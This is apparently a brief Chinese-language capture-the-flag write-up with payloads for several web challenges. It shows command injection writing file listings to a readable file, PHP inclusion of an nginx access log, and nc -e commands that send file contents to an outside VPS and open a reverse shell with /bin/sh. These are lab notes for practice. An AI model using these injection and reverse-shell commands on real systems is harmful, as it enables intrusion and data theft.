web签到
有长度限制
payload
ls />a
nl /*>a
然后访问a即可得到flag
easy_cmd
payload
num1=1;include "/var/log/nginx/access.log";&symbol=-&num2=3
然后就是日志包含那一套
easy_cmd
通过nc -e向自己的vps传递命令
nc x.x.x.x port -e ls /
nc x.x.x.x port -e cat /secert
也可以直接反弹个shell
nc x.x.x.x port -e /bin/sh
easy_sql
还在看
🌚